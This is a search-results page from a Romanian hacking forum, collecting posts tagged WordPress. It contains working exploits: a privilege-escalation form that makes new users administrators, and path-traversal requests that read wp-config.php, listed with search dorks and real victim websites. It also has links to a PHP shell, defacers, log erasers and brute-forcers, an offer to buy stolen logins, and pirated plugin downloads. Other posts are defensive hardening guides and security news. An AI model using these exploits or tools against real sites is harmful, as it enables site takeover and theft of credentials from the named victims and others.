Jump to content

Search the Community

Showing results for tags 'wordpress'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. # Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation # Date: 24-11-2014 # Software Link: https://wordpress.org/plugins/download-manager/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps # CVE: CVE-2014-9260 1. Description Every registered user can update every WordPress options using basic_settings() function. function basic_settings() { if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') { foreach ($_POST as $optn => $optv) { update_option($optn, $optv); } if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form'); die('Settings Saved Successfully'); } include('settings/basic.php'); } http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html 2. Proof of Concept Login as standard user (created using wp-login.php?action=register) then: <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings"> <input type="hidden" name="task" value="wdm_save_settings"> <input type="hidden" name="section" value="basic"> <input type="hidden" name="default_role" value="administrator"> <input type="submit" value="Hack!"> </form> After that create new user using wp-login.php?action=register. Newly created user will have admin privileges. 3. Solution: Update to version 2.7.3 Source
  2. Guest

    78 WordPress and HTML Themes

    Free 78 WordPress and HTML Themes. Download : http://www.mediafire.com/download/mjyys6kiobpu076/Themes.rar
  3. More than one million websites that run on the WordPress content management application run the risk of being completely hijacked by attackers exploiting critical vulnerability in most versions of a plugin called WP-Slimstat. Versions prior to the recently released Slimstat 3.9.6 contain a readily guessable key that's used to sign data sent to and from visiting end-user computers, according to a blog post published Tuesday by Web security firm Sucuri. The result is a SQL injection vector that can be used to extract highly sensitive data, including encrypted passwords and the encryption keys used to remotely administer websites. "If your website uses a vulnerable version of the plugin, you’re at risk," Marc-Alexandre Montpas, a senior vulnerability researcher at Sucuri, wrote. "Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover)." The WP-Slimstat secret key is nothing more than the MD5 hash of the plugin’s installation timestamp. An attacker could use the Internet Archive or similar sites to determine the year a vulnerable site was put online. That would leave an attacker with about 30 million values to test, an undertaking that could be completed in about 10 minutes. Once the secret key has been divined, the attacker can use it to pull data out of the database. WP-Slimstat is an analytics tool. Its listing on WordPress shows it has been downloaded more than 1.3 million times. People who operate websites that use the plugin should update immediately. Post updated to change headline. It previously read: More than1 million WordPress websites imperiled by critical plugin bug. Source
  4. Asa cum spune si titlul. Caut un expert in wordpress. Am un site unde trebuie sa asez niste div uri, cateva modificari de tip (postari recente) s.a plus un import in baza de date dintr un fixier txt. Estimez o munca de 1-2 zile maxim. Doresc o colaborare dinamica eventual prin microfon/skype. Platesc in avans, iar pretul il stabilim de comun acord.
  5. WordPress is the most popular CMS (Content Management System) available nowadays online, used by the vast majority of all sites. If you have a look at this report, WordPress holds the lion share (60.6%) of the sites whose CMS we know and a total of 23.4% of all sites. It is easy to use and it offers great flexibility, with both ready and custom templates and a plethora of plugins to put into effect. Moreover, WordPress provides its users with the opportunity to enhance the SEO-friendly (and thus Google-friendly) nature of their site pretty smoothly and it also offers mobile-friendly themes. These are some of the major reasons why WordPress has been characterized as one of the most successful CMS options to date, and this is why it is the number one choice for many web designers, developers, tech freaks and even novices and tech-illiterate people who seek to find a simple yet effective tool for creating their site. Due to its exponential growth and its universal popularity, WordPress is not immune to threats and hacking attempts. It is true that the more popular something is, the more likely it will be for others to seek compromising it in the long run. This is why it is not that rare a phenomenon to hear about WordPress sites having been hacked and not being able to function properly. Before we continue with our guide about cleaning up WordPress, it is important that we truly understand what website hacking is and what this can do to your site and your computer. What Website Hacking is, and How it Affects You There are two major types of website hacking that you should beware of, in order to ensure that you offer the best user experience to every single visitor and not compromise his or her overall security: The first type has to do with the establishment of a backdoor; this means that the hacker leaves room for returning to your site whenever he feels like it and gaining access to places that should be out of reach for him. The difficulty in tracing this type of website hacking lies in the fact that this backdoor is not visible to the naked eye – and thus it can go unnoticed for a truly long time. The second type involves the deterioration of user experience and the compromise of your site directly from the source. The visitors that click on your site can be redirected to other sites or get pop-ups on their screen as soon as they head to your home page. In addition, malware can be installed silently to the computers of your site’s visitors, and of course this is never a good thing. Now that we have comprehended what goes on in cases of WordPress sites being hacked, and before moving on to the process of WordPress database cleanup, it is time to highlight the signs that should alarm you that something is wrong with your site. Signs that Reveal a Potential WordPress Hack Even though the signs are not a perfect match to every single WordPress site that has been compromised, they offer some truly helpful information that should get you on your feet and urge you to dig deeper and see whether or not your site has indeed been hacked. Let’s see these signs in the form of bullets: Problems with e-mails: The hackers will start sending e-mails from your site, and you will most probably be blocked as spam mailer. This can affect your communication with others, as you will not even have a clue about your e-mail activity. Bad content added to WP: You cannot control what content is added to your site, and this is in fact one of the major factors that ought to urge you to start cleaning up the mess. Slow performance or crash: This is another indicator that you are in need of WordPress clean up after a hack. If you are experiencing too slow performance or if you see that your site has crashed, you should look no further. Traffic drops significantly: You will most likely observe that you get no traffic at all or you have lost most of your visitors from one day to the next. Unless you have dealt with a matter of bad reputation recently, this should alarm you. Website disappears: This is the most shocking sign that your site has been under attack. In some cases, the hackers remove everything from the site and thus take it down. As soon as you have noticed some of these signs, it is high time to take matters into your own hands. Though this process is neither easy nor simple to complete, you can in fact repair your WordPress site and make sure that you shield it against any future acts of this sort. How to Repair Your Hacked WordPress Site From the very moment when you determine that your WordPress site has been hacked, you need to take some immediate actions and start working toward cleaning everything up and securing your digital premises. Let’s have a look at what it takes for you to accomplish that: Restore Your Site via Upgrade and Reinstallation: Make use of your backup and restore your site, so that it can keep running. Upon doing so, you need to be thorough while reinstalling all the plugins and additional tools that you have been using so far. It is important to reinstall them and then upgrade them to the latest version. Scan and Cleanup Your Machine: If you had not installed an anti-virus program, please DO! This is essential, in order to highlight any red flags for you to consider. Scan the machine of yours in detail and fix any problems that emerge. Change All the Passwords: Do not be sloppy when it comes to cleaning up WordPress. On the contrary, you ought to be really scholastic and change all the passwords that you have been using in e-mail accounts, financial transactions and anywhere else. Of course, it goes without even saying that you need to change the WP administrator password and get a new one (rather than the default that many users don’t mind keeping). Back up Everything: Besides being able to restore your site in the event of hacking or crashing, you can compare the backups with your current WP site and check for any alterations whatsoever. Check wp-config.php File: If you come across any modifications when comparing your file with the wp-config-sample.php file, you had better change them. Engage in Premium Security Solutions: Although it can be tempting to handle your WordPress site and its maintenance on your own or make use of your son’s talent or the wit of your best friend, such options generally come with a greater percentage of risk. Instead, consider premium security solutions that will safeguard your site and deal with the proper WordPress maintenance required. Any Uploaded File Should Be Copied: This will allow you to keep everything under control. Even in the discomforting event of a crash or any other problem getting in the way, you will know that you have got copies to turn to. Fresh, New Version of WordPress: Do not settle for older versions of WordPress. Instead, be sure to get updates and have the latest version of WordPress that has fixed security issues and can keep you thoroughly protected. Go through Every Post: This can take some time, but it is worth the trouble. You should go through every post of yours and identify any problem, in order to deal with it effectively. How to Protect Your Site from Any Future Attack As hacking is not a one-time deal, you will have to comply with some security precautions that help you maintain everything perfectly secured on your WordPress site. Below, there are some pieces of advice that you ought to consider for protecting your WordPress website from any malicious intent: Restrict Administrative Privileges: The fewer the people who access your admin panel, the less likely it will be for breaches to occur. Scan on a Daily Basis: If you are vigilant and you do not neglect scanning your site daily for bugs and other vulnerabilities, the hack is less likely to succeed. Use Secured Protocols: Instead of connecting with the use of FTP, you can go for SFTP or SSH for ensuring that it is infinitely more difficult for somebody to track you down. Use 2-Verification: Make sure that you enhance your site’s security using 2-step verification. This will result in the hacker requiring much bigger effort towards accessing your site. Disable PHP Execution: You can find detailed instructions on how you can do that, since it will certainly help you out eliminate threats in the future. From everything that has been analyzed in this article on cleaning up WordPress, this is a tough job – however, it is not impossible to complete and what you gain is truly remarkable; a fully protected WordPress site that does not compromise anything in terms of security and performance! Source
  6. [+] AnonGhost PHP Shell [+] https://ghostbin.com/paste/9ckp3dst [+] Bypass Root Path With Zip File [+] https://ghostbin.com/paste/tdbvr2ug [+] Bypass Forbidden with Python via TCP Protocol [+] https://ghostbin.com/paste/qbrs9r8a [+] Wordpress 0day CSRF + Brute Token [+] https://ghostbin.com/paste/znxkcojv [+] Wordpress Index Hijack [+] https://ghostbin.com/paste/8wf2yj2v [+] CPanel & FTP Auto Defacer [+] https://ghostbin.com/paste/z6jfwrbm [+] Reverse IP Lookup [+] https://ghostbin.com/paste/kaa5na3x [+] Logs Eraser [+] https://ghostbin.com/paste/w9puv3kq [+] Facebook Multi-Account Bruteforce [+] https://ghostbin.com/paste/akn9adf8 [+] Bypass SafeMode [+] https://ghostbin.com/paste/j423dffz [+] Skype BruteForce [+] https://ghostbin.com/paste/r85xqq28 [+] Virtual Bypass Via Error_Log [+] https://ghostbin.com/paste/qjb2shhu [+] Shtml Bypass Symlink Via Error [+] https://ghostbin.com/paste/orqjsu6e [+] Bypass Users Server [+] https://ghostbin.com/paste/koew333z [+] Cpanel Mass Defacer [+] https://ghostbin.com/paste/nt3zc43b [+] Bypass Chmod Directory [+] https://ghostbin.com/paste/2q6vjea3 [+] Bypass Root Path [+] https://ghostbin.com/paste/y8jx2hfs [+] Wordpress Add Admin User [+] https://ghostbin.com/paste/ffqvakw8 [+] Server Informations [+] https://ghostbin.com/paste/om32c59z [+] Twitter Multi-Account Brute force [+] https://ghostbin.com/paste/hsmbtep8 [+] Symlink Bypass [+] https://ghostbin.com/paste/ywv75o46 [+] Bypass /etc/passwd [+] https://ghostbin.com/paste/6nuom97j Password: ./d3f4ult_v1rUsa
  7. Cumpar logari Wordpress ! PM sau Icq : 689646868 Urgent , WP cu IP sa fie !
  8. WordPress has become a huge target for attackers and vulnerability researchers, and with good reason. The software runs a large fraction of the sites on the Internet and serious vulnerabilities in the platform have not been hard to come by lately. But there’s now a new bug that’s been disclosed in all versions of WordPress that may allow an attacker to take over vulnerable sites. The issue lies in the fact that WordPress doesn’t contain a cryptographically secure pseudorandom number generator. A researcher named Scott Arciszewski made the WordPress maintainers aware of the problem nearly eight months ago and said that he has had very little response. “On June 25, 2014 I opened a ticked on WordPress’s issue tracker to expose a cryptographically secure pseudorandom number generator, since none was present,” he said in an advisory on Full Disclosure. “For the past 8 months, I have tried repeatedly to raise awareness of this bug, even going as far as to attend WordCamp Orlando to troll^H advocate for its examination in person. And they blew me off every time.” The consequences of an attack on the bug would be that the attacker might be able to predict the token used to generate a new password for a user’s account and thus take over the account. Arciszewski has developed a patch for the problem and published it, but it has not been integrated into WordPress. Since the public disclosure, he said he has had almost no communication from the WordPress maintainers about the vulnerability, save for one tweet from a lead developer that was later deleted. Arciszewski said he has not developed an exploit for the issue but said that an attacker would need to be able to predict the next RNG seed in order to exploit it. “There is a rule in security: attacks only get better, never worse. If this is not attackable today, there is no guarantee this will hold true in 5 or 10 years. Using /dev/urandom (which is what my proposed patch tries to do, although Stefan Esser has highlighted some flaws that would require a 4th version before it’s acceptable for merging) is a serious gain over a userland RNG,” he said by email. But, as he pointed out, this kind of bug could have a lot of value for a lot of attackers. “WordPress runs over 20% of websites on the Internet. If I were an intelligence agency (NSA, GCHQ, KGB, et al.) I would have a significant interest in hard-to-exploit critical WordPress bugs, since the likelihood of a high-value target running it as a platform is pretty significant. That’s not to say or imply that they knew about this flaw! But if they did, they probably would have sat on it forever,”Arciszewski said. WordPress officials did not respond to questions for this story before publication. Source
  9. WordPress is the most popular blogging platform in the world. Millions of websites including various popular blogs are using WordPress as a content publishing platform. So, hackers are also more interested in hacking WordPress based websites. WordPress usually pushes updates to patch all the known vulnerabilities, but third party themes and plugins make WordPress vulnerable. Sometimes hackers also find vulnerabilities in WordPress that allow them to hack the whole server. In the past three months, we have seen 2 major zero-day vulnerabilities and mass hacking of WordPress websites. Thousands of websites were hacked by exploiting these vulnerabilities. There are many past examples in which a single vulnerable plugin led to the hacking of whole web server hosting hundreds of websites. A few days back, we discussed SoakSoak malware which affected 100k websites in very little time by exploiting the vulnerability in a plugin. So, if you are a WordPress user, you must take care of security. You must always keep your WordPress installation updated and secure. In a previous post, I also discussed WPScanner, a tool for scanning a WordPress website and finding vulnerabilities in it. If you are WordPress user, you can use this tool to find vulnerabilities in your website and patch. In this post, I will discuss various security plugins available for WordPress. These security plugins offer a wide range of features to make your WordPress blog secure from known threats. These plugins keep their services updated with security from the latest exploits and threats. If you are really serious about your online business running on WordPress, you must use any of these plugins to make it secure. These are the 7 best security plugins available for WordPress. 1. WordFence WordFence is one of the most popular WordPress security plugins. It keeps on checking your website for malware infection. If scans all the files of your WordPress core, theme and plugins. If it finds any kind of infection, it will notify you. It claims to make your WordPress website 50 times faster and secure. For making your website faster, it uses Falcom caching engine. This plugin is free, but a few advanced features are available for premium users. If you can afford it, do it. This plugin blocks bruteforce attack and can add two factor authentication via SMS. You can also block traffic from a specific country. It also includes a firewall to block fake traffic, botnet and scanners. It also scans your hosting for known backdoors including C99, R57 and others. If it finds anything, you will instantly get email notification. It also scans your posts and comments for malicious code. It also supports multi-site. You can also check the traffic on your WordPress website in real time and see if there is any security threat attacking your website. Download WordFence 2. BulletProof Security BulletProof Security is another popular WordPress security plugin that takes care of various things. It adds firewall security, database security, login security and more. It comes with four-click setup interface. Just activate this plugin and then relax. It will take care of your website. It limits failed login attempts and blocks security scanners, fake traffic, IP blocking and code scanners. It keeps on checking the code of WordPress core files, themes and plugins. In case of any known infection, it notifies admin. It also optimizes the performance of your website by adding caching. It comes with built-in file manager for htaccess. It protects WordPress websites against various vulnerabilities including XSS, RFI, CRLF, CSRF, Base64, Code Injection, SQL Injection and many other. This plugin keeps itself updated with new vulnerabilities to keep your website protected. It keeps on updating it according to new exploits and vulnerabilities. It also has a pro version which offers some advanced features to improve the security of your website. But the free version is popular enough to make your website secure. Download BulletProof Security 3. Sucuri Security Sucuri Security is the security plugin for WordPress. This plugin is from the popular website security and auditing company Sucuri. This plugin offers various security features like security activity auditing, file integrity monitoring, malware scanning, blacklist monitoring, and website firewall. It incorporates various blacklist engines including Google Safe Browsing, Sucuri Labs, Norton, McAfee Site Advisor and more to check your website. If there is anything wrong, it will notify you via email. It protects your website from DOS attack, Zero Day Disclosure Patches, bruteforce attacks and other scanner attacks. It also keeps log of all activities and keep these logs safe in the Sucuri cloud. So, if an attacker is able to bypass the security controls, your security logs will be safe within Sucuri’s security operations center. If you are willing to pay, you can go for the Sucuri premium service. They are a well known web application security company with a team of experts. So, you can get better service and advice. Download Sucuri Security 4. iThemes Security (formerly Better WP Security) iThemes Security is also a nice WordPress security plugin which claims to offer 30+ ways to secure and protect your WordPress website. With one click installation, you can stop automated attacks and protect your website. it also fixes various common security holes in your website. It tracks registered users’ activity and adds two-factor authentication, import/export settings, password expiration, malware scanning, and various other things. It scans the entire website and tries to find if there is any potential vulnerability in your website. It also prevents bruteforce attacks and ban IP addresses which try to bruteforce. It also forces users to use secure passwords and also forces SSL for admin area in server support. Unlike other plugins, the GeoIP banning feature is not available. But the company has promised to bring this feature soon. We cannot say exactly when, but it says the feature is coming soon. It also integrates Google reCAPTCHA to prevent comment spam on your website. Download iThemes security 5. Acunetix WP SecurityScan Acunetix WP Security Scan is the WordPress security plugin by Acunetix. Acunetix is a well known company in web application security. It offers a security scanning tool to find vulnerabilities in web applications. This plugin helps you to secure your WordPress website and suggests measures to improve the security. It offers file permission security, version hiding, admin protection, removing WP generator tag from source, and database security. It removes various information from the source code of the page which can be used in the information gathering process before attack. This includes theme update information, plugin update information, really simple discover meta tag, WordPress version, Windows live write meta tag, error information from login page, versions from scripts, versions from stylesheets, database and php error reporting. It also offers a database backup tool to take a backup of your website. With its live traffic monitor tool, you can check traffic in real time. It also scans your website to notify known web application vulnerabilities. Download Acunetix WP SecurityScan 6. All In One WP Security & Firewall All In One WP Security & Firewall is another popular WordPress security plugin to check vulnerabilities in your WordPress website. This plugin is easy to use and reduces the security risks by adding recommended security practices. It protect against bruteforce login attack and lockdown if someone tries to bruteforce. It also sends you an email notification if somebody gets locked out due to failed login attempts. It detects if a user tries to save a weak password and forces him/her to use a strong password. It also monitors the account activity of all users and keeps track of username, IP and login date time. It also allows you to schedule automatic backup and receive email notification. It also protects PHP code by disabling admin area editing. It adds a web application firewall in your website and enables 5G Blacklist to prevent various attacks. It denies bad query strings, prevent XSS, CSRF, SQL injection, malicious bots and other security threats. It also has a security scanner which keeps track of files and notifies you about each changes in your WordPress system. It can also detect malicious code in your WordPress website. It blocks and protects your blog from comment spam. It also works with most plugins without any problem. Download All In One WP Security & Firewall 7. 6Scan Security 6Scan Security is a popular auto-fix protection for your WordPress site. It can protect your website from hackers. It offers rule-based protection for your website and tries to keep the security of your website up to date. It has a security scanner which scans and protect your website against SQL injection, Cross Site Scripting, CSRF, Directory traversal, Remote file including, DOS attack and other OWASP top ten security vulnerabilities. A notable feature of the plugin is its automatic vulnerability fix. When it finds any vulnerable code, it applies auto-fix by using its auto-fix server-side agent solution. It also has an automatic malware fix for malware related issues on your website. Like other plugins, it also sends email notifications if there is anything serious in your website. Download 6 Scan Security Additional security measures Along with these WordPress plugins, you should also follow a few security measures from your side. These will help you in improving the security of your blog. Always keep your WordPress installation up to date. Update your WordPress as soon as possible if there is any new WordPress update. Most of the times, hacked websites are those which are using an older version of WordPress. Older versions of WordPress always have a few known security issues. And exploits for these security issues are available for free. Even a kid can hack your website if it is running on a vulnerable version of WordPress. Always keep plugins and themes added in your blog updates to latest version. New versions always come with new features and security fixes. So, updating plugins and themes is necessary. Most of the time, these third party plugins and themes are the reason for vulnerability in WordPress websites. Attackers can exploit these plugins to gain access to your website or inject malicious script in your website. Download themes and plugins only from trusted sources. Nulled themes and themes from untrusted sources generally contain malware in the code. If you install any security plugin, you will be notified, but why to take risk. Avoid any unknown source for download plugins and themes. Avoid using the administrator username ‘admin’, because this is default and common. By using this username in your blog, you are making the attacker’s work easier. He does not need to guess the username now, just bruteforce your website for username admin. Thanks to these plugins, bruteforce will not work anymore. Always use strong password for your WordPress account. WordPress bruteforcing tools are available. So, do not take the risk. Use a long password with capital letters, small case letters, numbers and special characters. A combination of these makes a strong password which is hard to guess. Conclusion These are few WordPress security plugins you can use to make your WordPress blog secure. You do not need to download all these plugins. Just try any one and see if it suits you. If you are not happy with its performance, you can download any other plugin to check and use. Every single plugin offers unique security features. You will feel relaxed after having any of these plugins in your website. Malware scanning, exploit scanning and brute force protection are few features which you must have in your website. If you have a good budget and do not want to be in technicalities, you can go for premium versions of the plugins which offer more advanced security features with detail reports. A few plugins also offer free customer support and security assessment with the pro version. With an increasing number of hacking attacks, it is necessary to have security in your website. If you are a WordPress user, what security plugin do you use in your website? Share it with us in the comments. Source
  10. Stie cienva cum integrez vbulletin in wordpress ? exista vrun modul ? Multumesc.
  11. Am nevoie de o persoana priceputa in optimizare SEO, optional wordpress instalare, configurare, etc..
  12. |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| |[*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/RedSteel | |[*] Date : Date: 2015-01-25 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : http://www.webdesignlessons.com/redsteel-wordpress-theme/ | |[*] Tested on: Windows 7 | |[*] Discovered By : ACC3SS | |-------------------------------------------------------------------------| | |[*] Location : [localhost]/wp-content/themes/RedSteel/download.php?file=filename.php | |-------------------------------------------------------------------------|download.php | Vulnerable file : download.php | | Vulnerable code : | <?php $file = @$_GET['file']; $parts = explode('/',$file); $fileName = $parts[sizeof($parts)-1]; if ((isset($file))&&(file_exists($file))) { header("Content-type: application/force-download"); header('Content-Disposition: inline; filename="' . $fileName . '"'); header("Content-Transfer-Encoding: Binary"); header("Content-length: ".filesize($file)); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $fileName . '"'); readfile($file); } ?> | | | | | | |[*] Proof: | |[*] http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php | |[*] http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php | |[*] | | |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| Source
  13. [+] Title: Wordpress slider reolusion local file download [+] Date: 2015-01-25 [+] Author: JOK3R [+] Vendor Homepage: https://wordpress.org/plugins/patch-for-revolution-slider/ [+] Tested on: windows 7 / firefox , kali linux / firefox [+] Vulnerable Files: /plugins/revolution-slider/ [+} Dork : "Index of" /wp-content/plugins/revolution-slider/ ### POC: http://victim/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Demo: http://www.bungaburgerbar.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.peanut215.com/peanut/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php http://www.pro-businesscenter.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php ### Credits: [+] Special Thanks: Sheytan Azzam - Mohamad NOfozi - Root3r - Sina_lizard - Ali Ahmady - iliya Norton - Mr.Moein* - ALIREZA_PROMIS* And All iranian Hacker's And Exploiter's <3 [+] iran-cyber.in Source
  14. Am un site unde folosesc wordpress . In trecut site-ul a fost foarte vizitat si am ~ 70.000 comentarii spam neapropbate . Cum ma afecteaza pe mine faptul ca as vrea sa aprob toate cele 70.000 comentarii . Ce avantaje imi ofera asta din punct de vedere SEO ? Dar dezavantaje ? Ca sa va lamuresc site-ul era pentru PPD cea mai comuna nisa games & hacks .
  15. WPHardening fortification is a security tool for WordPress Usage $ python wphardening.py -h Options: --version show program's version number and exit -h, --help show this help message and exit -v, --verbose Active verbose mode output results --update Check for WPHardening latest stable version Target: This option must be specified to modify the package WordPress. -d DIRECTORY, --dir=DIRECTORY **REQUIRED** - Working Directory. --load-conf=FILE Load file configuration. Hardening: Different tools to hardening WordPress. -c, --chmod Chmod 755 in directory and 644 in files. -r, --remove Remove files and directory. -b, --robots Create file robots.txt -f, --fingerprinting Deleted fingerprinting WordPress. -t, --timthumb Find the library TimThumb. --wp-config Wizard generated wp-config.php --delete-version Deleted version WordPress. --plugins Download Plugins Security. --proxy=PROXY Use a HTTP proxy to connect to the target url for --plugins and --wp-config. --indexes It allows you to display the contents of directories. --malware-scan Malware Scan in WordPress project. Miscellaneous: -o FILE, --output=FILE Write log report to FILE.log Examples Check a WordPress Project $ python wphardening.py -d /home/path/wordpress -v Change permissions $ python wphardening.py -d /home/path/wordpress --chmod -v Remove files that are not used $ python wphardening.py -d /home/path/wordpress --remove -v Create your robots.txt file $ python wphardening.py -d /home/path/wordpress --robots -v Remove all fingerprinting $ python wphardening.py -d /home/path/wordpress --fingerprinting -v Check a TimThumb library $ python wphardening.py -d /home/path/wordpress --timthumb -v Create Index file $ python wphardening.py -d /home/path/wordpress --indexes -v Download Plugins security $ python wphardening.py -d /home/path/wordpress --plugins Wizard generated wp-config.php $ python wphardening.py -d /home/path/wordpress --wp-config Deleted version WordPress $ python wphardening.py -d /home/path/wordpress --delete-version -v WPHardening update $ python wphardening.py --update Use all options $ python wphardening.py -d /home/user/wordpress -c -r -f -t --wp-config --delete-version --indexes --plugins -o /home/user/wphardening.log Download: https://github.com/elcodigok/wphardening
  16. template-uri beslpatnye ?i plugin-uri site-uri de prezentare Traksa.com Eu voi fi ad?ugarea de intr?ri în fiecare zi în acest thread. În cazul în care nu g?si?i un model de aici, du-te ?i verific? pe site-ul, exist? o mul?ime de ele. provided by site traksa.com. I will post some themes or plugins everyday in this thread.
  17. Din lipsa de timp, nu ma voi mai ocupa de aplicatiile desktop. Creez site-uri mici si mijlocii, scripturi, pagini, bug fixes, optimizari. Scriu cod curat si comentat. UPDATE: Dupa ce am vazut zeci de scripturi/pagini facute de unu si de altu', pot sa spun ca scriu caligrafic! Pentru site-uri complete ma pot ocupa si de gazduire si de configurarea serverului astfel incat site-ul sa fie predat "la cheie". Ofer si mentenanta unde este cazul. Backend: PHP + MySQL Frontend: HTML + CSS + jQuery / Bootstrap Metode de plata: Paypal sau Transfer bancar Plata: La finalizarea proiectului sau esalonat, de la caz la caz. Email: net_wav3@yahoo.com Skype: wav3ee Telegram: https://t.me/wav3e
  18. Salut! De curand mi-am facut un blog pe wordpress si cum nu am mai lucrat cu aceasta platforma de vreo 2 ani cred ca lucrurile s-au mai schimbat si prefer sa va intreb pe voi. Inainte foloseam ca si plugin pentru SEO, All in one SEO Pack, imi puteti recomanda altul mai bun sau este ok daca-l folosesc tot pe asta? Mai este si SeoPressor care am inteles ca este foarte bun, doar ca este premium. Multumesc anticipat!
  19. need dotnet framework 4.5 Link: Joomla Vulnerability Scanner Link: WPscan
  20. Visual Composer for WordPress will save you tons of time working on the site content. Now you’ll be able to create complex layouts within minutes! Sales page Demo page Download nulled
  21. Salutare, Lucrez la un site cu platforma Wordpress si cu tema BoxOffice ce poate fi gasita aici. Site-ul este acesta. Problema mea este ca linkurile de la paginarea din josul paginii nu duc decat catre o eroare 404. Banuiesc ca problema este din cauza ca folosesc o taxonomie personalizata si anume "Filme" dar nu stiu cum sa o rezolv. Rog pe cineva daca stie cum se poate rezolva si ce sa modific exact. Multumesc frumos!
  22. Am nevoie de un script care sa tina cont de fiecare data cand un user inregistrat pe site da share unui articol pe social network-uri (FB, Twitter, G+ si Pinterest). De fiecare data cand user-ul da share la un articol, share count-ul acelui user creste cu unu. Site-ul e in Wordpress si hosting-ul e solid.
  23. WP SEO Ninja este un plugin pentru wordpress care te ajuta la optimizarea corecta a site-ului tau pentru motoarele de cautare sau SEO. Acest plugin fata de alte programe asemanatoare, ca All in One SEO , ofera o unealta foarte folositoare pentru a optimiza nu doar interfata principala sau partea technica ci ajuta si pentru a optimiza posturile in sine care la randu lor vor ajuta intregul site. Instalarea este foarte simpla ca la orcare alt plugin. (Click pe Plugins ->> Add new ->> Upload) LE: Is the WP SEO Ninja Compatible with Foreign Language Sites As of now the WP SEO Ninja is not compatible with foreign language sites. So if you have a foreign language site please do not get this. Dowload Links: http://www.mediafire.com/?hel8ra60u1qbcdg http://www.multiupload.nl/SFCV01PFBG http://www.4shared.com/zip/vjnttEvq/wpseoninja.html http://depositfiles.com/files/fbh7kokma
  24. Vand advertoriale cu maxim 3 link-uri incluse in articol pe bloguri .edu la pretul de 5 dolari/advertorial . De asemenea vand bloguri .edu pe platforma wordpress, web 2.0 inclus, administrat numai de voi la pret de 150 $
  25. Gravity Forms is a complete contact form solution for WordPress. With Gravity Forms you can build complex, interactive contact forms in minutes with no programming experience. Add-ons: Campaign Monitor Freshbooks Paypal Twilio User Registration MailChimp Metarecovery Info: WordPress Forms - Gravity Forms Contact Form Builder and Lead Data Management Plugin For WordPress Add-Ons - Gravity Forms 1.5 Demo: Gravity Forms Demo usr: demo pwd: demo Download: http://dl.dropbox.com/u/28878468/Gravity_Forms_1.6.zip Gravity_Forms_1.6.zip | localhostr.com - share … anything
×
×
  • Create New...